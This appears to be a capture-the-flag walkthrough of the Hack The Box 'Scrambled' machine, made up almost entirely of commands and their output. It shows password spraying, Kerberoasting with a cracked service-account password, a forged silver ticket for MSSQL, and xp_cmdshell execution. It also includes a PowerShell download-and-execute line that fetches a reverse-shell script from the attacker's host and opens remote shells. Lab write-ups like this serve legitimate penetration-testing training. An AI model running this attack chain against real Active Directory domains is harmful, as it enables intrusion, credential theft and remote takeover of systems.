Hack The Box - Scrambled
User
Recon
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
1433/tcp open ms-sql-s syn-ack
3268/tcp open globalcatLDAP syn-ack
4411/tcp open found syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
49667/tcp open unknown syn-ack
49673/tcp open unknown syn-ack
49674/tcp open unknown syn-ack
49700/tcp open unknown syn-ack
49714/tcp open unknown syn-ack
from port 80 user ksimpson
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
❯ kerbrute passwordspray -d scrm.local --dc 10.129.10.13 users.txt ksimpson
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 07/02/26 - Ronnie Flathers @ropnop
2026/07/02 06:57:22 > Using KDC(s):
2026/07/02 06:57:22 > 10.129.10.13:88
2026/07/02 06:57:22 > [+] VALID LOGIN: ksimpson@scrm.local:ksimpson
2026/07/02 06:57:22 > Done! Tested 1 logins (1 successes) in 0.356 seconds
1
2
3
4
❯ getTGT.py 'scrm.local/ksimpson:ksimpson' -dc-ip 10.129.10.13
Impacket v0.14.0.dev0+20260619.174856.9a5621d4 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in ksimpson.ccache
1
❯ export KRB5CCNAME=ksimpson.ccache
use klist to verify it.
❯ smbclient.py -k -no-pass -dc-ip 10.129.10.13 scrm.local/ksimpson@dc1.scrm.local
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# shares
Share Name Type Comment
----------------------------------------------------------------------
ADMIN$ DISK (SPECIAL) Remote Admin
C$ DISK (SPECIAL) Default share
HR DISK
IPC$ IPC (SPECIAL) Remote IPC
IT DISK
NETLOGON DISK Logon server share
Public DISK
Sales DISK
SYSVOL DISK Logon server share
# use Public
# mget *
[*] Downloading Network Security Changes.pdf
1
2
3
4
5
6
7
8
9
10
11
❯ GetUserSPNs.py -k -no-pass scrm.local/ksimpson -dc-host dc1.scrm.local -request
Impacket v0.14.0.dev0+20260619.174856.9a5621d4 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 22:02:02.351452 2026-07-02 06:29:40.277817
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 22:02:02.351452 2026-07-02 06:29:40.277817
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$a853cdf76987c584f10befc33765f78a$6b61955a9ace07a5586fdc5b53e15ad5e2707849b29d5601e7954251eecefe2ba150a963504aa0283911e93f998c7892b423a013f0325fe2cfd4ce902966d74af9acd5ccc0607d0e15f85ec9a5ca3b5b780b7c7db5143ef099b54f9754f3f19e8a70ded103929158afe2f1ffff1bd986c02a84a089d3cae3b19326e31fbf7be2f830c1e9505a19fb31aa4f262ffa3f181d9d1366b254724e952826bd92868bd20682198a52dad493f2ba4ec4d1d95ced4411144da500a47cb40c4718829f336339c91bee9291e8818a7f0a7f5257e1c958efb5b717f1634e536db54092ce1bd006356ed07a9bb3ab3c6beef18540b56549e109561e3aeae0ed5f27a0faefc7ac123d510250f55458ed06766144820efca5d76a6a0a528e7a06b3ad35bcfef248548a121ff3cad69ac4da62b7b1db452de8c8b8ae5b1c1948e16440c55dc31dfea0b839e7ada0f7ee7c5db092a4a0e612bad7a0cc36b5b3d29ea5bd0632914d9b77b64242e272133240575c851f424ae08780543f71765098fe3e370791d4bf0897ec337d95f63a773db7e8160a4dfa131bf6032320989afc05ca404a4634473e57c4ac46bad1378ceec12e62a55027fbd3aae71646d1fc888608a7d0db91a9693630a12c23abafc3833ef4052ccf0ac2532874d9e245fc07a5665a56dd610afe8a2b877c39475c911f852d7b397ff874ce3cdb810cbc4f3047bd9d85a86447e8d41a95d10d4ed81f28ba754bc5137bef8f60139ed53f2758767397fac033a6249baa23ade9bfb23d9f4d288a0dbe2283f081576325ed438f55d7eb1740d5d02e28d3a4f9ebe35f5a6063752f1b27bdd1d5ead4d3ec9ee39cd93d9068d3546b7c602eb0b21cdc692c3f9349be60e2682b00af8e8f6fcec8364d17c5dd9545c4a5062937aa89f6218c61ac01ab1e8c3bf42c2156e66f8339dd4ecf18ce93b72bfd3135a2e4d103582b9cbee106a8a8f22d3504c5b42959230ed590df5e6697337c39d9c664a9f837e677aba18619b6fd53a3fdc174edc984ad995febf3b34f07f90a7067edce1f51b2a0126383266708ae61f608204f4ce9bb299b66c9e46079b65caba4e83fb53cf664f3a96d446c686c65a3198123ed6ef8b4c35ee80d9ad11422a4319e887d79155f43175b273115d87494a1584b906fb78fe89c49d0254f30a0237032c7df9577eea20ff8655d7ed86c6ca818556ce3203c2be6c706562b71e708a6a534297d31d0987b97de05e549a974ce83b75e8ed896a83d4e785b8c1f6ff5a6d1444df63eb732a9a0df9e35c81a751b13b4d907e17a46af2a6852d5ef6595e2186bf1fc770655240f8df713183346c427ff35f1b59c24c2664ad29102a7e8a055f0d1c65567144e219c611a4bfb56a94a1ecc793354bf1c424a224760f6e7608fbf1ce1669b4f1015c13f035032b0daabb41a8a310165c6
1
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$a853cdf76987c584f10befc33765f78a$6b61955a9ace07a5586fdc5b53e15ad5e2707849b29d5601e7954251eecefe2ba150a963504aa0283911e93f998c7892b423a013f0325fe2cfd4ce902966d74af9acd5ccc0607d0e15f85ec9a5ca3b5b780b7c7db5143ef099b54f9754f3f19e8a70ded103929158afe2f1ffff1bd986c02a84a089d3cae3b19326e31fbf7be2f830c1e9505a19fb31aa4f262ffa3f181d9d1366b254724e952826bd92868bd20682198a52dad493f2ba4ec4d1d95ced4411144da500a47cb40c4718829f336339c91bee9291e8818a7f0a7f5257e1c958efb5b717f1634e536db54092ce1bd006356ed07a9bb3ab3c6beef18540b56549e109561e3aeae0ed5f27a0faefc7ac123d510250f55458ed06766144820efca5d76a6a0a528e7a06b3ad35bcfef248548a121ff3cad69ac4da62b7b1db452de8c8b8ae5b1c1948e16440c55dc31dfea0b839e7ada0f7ee7c5db092a4a0e612bad7a0cc36b5b3d29ea5bd0632914d9b77b64242e272133240575c851f424ae08780543f71765098fe3e370791d4bf0897ec337d95f63a773db7e8160a4dfa131bf6032320989afc05ca404a4634473e57c4ac46bad1378ceec12e62a55027fbd3aae71646d1fc888608a7d0db91a9693630a12c23abafc3833ef4052ccf0ac2532874d9e245fc07a5665a56dd610afe8a2b877c39475c911f852d7b397ff874ce3cdb810cbc4f3047bd9d85a86447e8d41a95d10d4ed81f28ba754bc5137bef8f60139ed53f2758767397fac033a6249baa23ade9bfb23d9f4d288a0dbe2283f081576325ed438f55d7eb1740d5d02e28d3a4f9ebe35f5a6063752f1b27bdd1d5ead4d3ec9ee39cd93d9068d3546b7c602eb0b21cdc692c3f9349be60e2682b00af8e8f6fcec8364d17c5dd9545c4a5062937aa89f6218c61ac01ab1e8c3bf42c2156e66f8339dd4ecf18ce93b72bfd3135a2e4d103582b9cbee106a8a8f22d3504c5b42959230ed590df5e6697337c39d9c664a9f837e677aba18619b6fd53a3fdc174edc984ad995febf3b34f07f90a7067edce1f51b2a0126383266708ae61f608204f4ce9bb299b66c9e46079b65caba4e83fb53cf664f3a96d446c686c65a3198123ed6ef8b4c35ee80d9ad11422a4319e887d79155f43175b273115d87494a1584b906fb78fe89c49d0254f30a0237032c7df9577eea20ff8655d7ed86c6ca818556ce3203c2be6c706562b71e708a6a534297d31d0987b97de05e549a974ce83b75e8ed896a83d4e785b8c1f6ff5a6d1444df63eb732a9a0df9e35c81a751b13b4d907e17a46af2a6852d5ef6595e2186bf1fc770655240f8df713183346c427ff35f1b59c24c2664ad29102a7e8a055f0d1c65567144e219c611a4bfb56a94a1ecc793354bf1c424a224760f6e7608fbf1ce1669b4f1015c13f035032b0daabb41a8a310165c6:Pegasus60
Pegasus60
1
2
3
4
5
❯ kerbrute passwordspray -d scrm.local --dc 10.129.10.13 users.txt Pegasus60
[snip]
[+] VALID LOGIN: sqlsvc@scrm.local:Pegasus60
1
2
3
4
❯ getTGT.py scrm.local/sqlsvc:Pegasus60 -dc-ip 10.129.12.93
Impacket v0.14.0.dev0+20260619.174856.9a5621d4 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in sqlsvc.ccache
sqlsvc is the AD account whose Kerberos key protects tickets for MSSQLSvc/dc1.scrm.local:1433.
now performing silver attack
we need sid of the domain
1
2
3
4
❯ nxc ldap 10.129.12.95 --use-kcache --get-sid
LDAP 10.129.12.95 389 DC1 [*] None (name:DC1) (domain:SCRM.LOCAL) (signing:None) (channel binding:Never) (NTLM:False)
LDAP 10.129.12.95 389 DC1 [+] SCRM.LOCAL\sqlsvc from ccache
LDAP 10.129.12.95 389 DC1 Domain SID S-1-5-21-2743207045-1827831105-2542523200
get ntlm hashes
1
2
3
4
5
6
7
❯ python3
Python 3.14.6 (main, Jun 15 2026, 11:36:54) [GCC 16.1.1 20260430] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from impacket.ntlm import compute_nthash
>>> print(compute_nthash("Pegasus60").hex())
b999a16500b87d17ec7f2e2a68778f05
>>>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
❯ ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSvc/dc1.scrm.local Administrator
Impacket v0.14.0.dev0+20260619.174856.9a5621d4 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving/Updating ticket in Administrator.ccache
❯ export KRB5CCNAME=Administrator.ccache
now access ms-sql as Administrator
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
❯ mssqlclient.py scrm.local/Administrator@DC1.scrm.local -k -no-pass
Impacket v0.14.0.dev0+20260619.174856.9a5621d4 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)> exec sp_configure 'xp_cmdshell', 1;
INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator dbo@master)> RECONFIGURE;
SQL (SCRM\administrator dbo@master)> exec xp_cmdshell 'whoami';
output
-----------
scrm\sqlsvc
NULL
SQL (SCRM\administrator dbo@master)>
now uploading nc.exe and establishing a reverse shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
❯ nc -lnvp 9000
Listening on 0.0.0.0 9000
Connection received on 10.129.12.95 55389
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
scrm\sqlsvc
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\Windows\system32>
juicypotato gives COM -> recv failed with error: 10038 and bloodhound gives no interesting path but we can still use juicypotatong (latest one) but that’s not the box’s intent since the exploit is new and the box is old but if we recall network security changes pdf file it talked about credentials in sql database. here are the credentials
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
SQL (SCRM\administrator dbo@master)> use scramblehr
ENVCHANGE(DATABASE): Old Value: master, New Value: ScrambleHR
SQL (SCRM\administrator dbo@ScrambleHR)> select name from sys.tables
name
----------
Employees
UserImport
Timesheets
SQL (SCRM\administrator dbo@ScrambleHR)> select * from employees
EmployeeID FirstName Surname Title Manager Role
---------- --------- ------- ----- ------- ----
SQL (SCRM\administrator dbo@ScrambleHR)> select * from userimport
LdapUser LdapPwd LdapDomain RefreshInterval IncludeGroups
-------- ----------------- ---------- --------------- -------------
MiscSvc ScrambledEggs9900 scrm.local 90 0
SQL (SCRM\administrator dbo@ScrambleHR)> select * from timesheets
EmployeeID TimeStart TimeEnd
---------- --------- -------
SQL (SCRM\administrator dbo@ScrambleHR)>
MiscSvc:ScrambledEggs9900
now since ntlm is disabled we’ll use powershell
C:\Users\sqlsvc>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\sqlsvc> $pass = ConvertTo-SecureString "ScrambledEggs9900" -AsPlainText -Force
$pass = ConvertTo-SecureString "ScrambledEggs9900" -AsPlainText -Force
PS C:\Users\sqlsvc> $cred = New-Object System.Management.Automation.PSCredential ("scrm.local\MiscSvc", $pass)
$cred = New-Object System.Management.Automation.PSCredential ("scrm.local\MiscSvc", $pass)
PS C:\Users\sqlsvc> Invoke-Command -ComputerName dc1.scrm.local -Credential $cred {whoami}
Invoke-Command -ComputerName dc1.scrm.local -Credential $cred {whoami}
scrm\miscsvc
now edit the tail of InvokePowerShellTCP.ps1 for easier Reverse Shell
1
2
3
4
5
6
7
8
9
10
❯ tail Invoke-PowerShellTcp.ps1
}
}
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.182 -Port 9001
on our sqlsvc shell
PS C:\Users\sqlsvc> Invoke-Command -ComputerName dc1.scrm.local -Credential $cred {IEX (New-Object Net.WebClient).DownloadString("http://10.10.15.182:8000/Invoke-PowerShellTcp.ps1")}
Invoke-Command -ComputerName dc1.scrm.local -Credential $cred {IEX (New-Object Net.WebClient).DownloadString("http://10.10.15.182:8000/Invoke-PowerShellTcp.ps1")}
get user.txt
1
2
3
4
5
6
7
8
9
10
❯ nc -lnvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.129.12.95 63816
Windows PowerShell running as user miscsvc on DC1
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Users\miscsvc\Documents>more ..\Desktop\user.txt
[snip]
PS C:\Users\miscsvc\Documents>
Root
running winpeas we find some interesting services running
1
2
3
4
[snip]
Scramble Sales Orders Server(Scramble Sales Orders Server)[C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe 4411] - Autoload - No quotes and Space detected
=================================================================================================
we also have Shares Folder
1
2
3
4
5
6
7
8
9
10
11
12
13
14
PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 03/11/2021 23:44 inetpub
d----- 31/10/2021 21:13 PerfLogs
d-r--- 01/06/2022 12:43 Program Files
d----- 03/11/2021 16:50 Program Files (x86)
d----- 01/11/2021 15:21 Shares
d----- 08/11/2021 00:39 Temp
d-r--- 05/11/2021 14:56 Users
d----- 08/06/2022 23:39 Windows
interesting exe file as we saw earlier
1
2
3
4
5
6
Directory: C:\Shares\IT\Apps\Sales Order Client
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 05/11/2021 20:52 86528 ScrambleClient.exe
-a---- 05/11/2021 20:52 19456 ScrambleLib.dll
now using deserialization bug we can get a reverse shell and root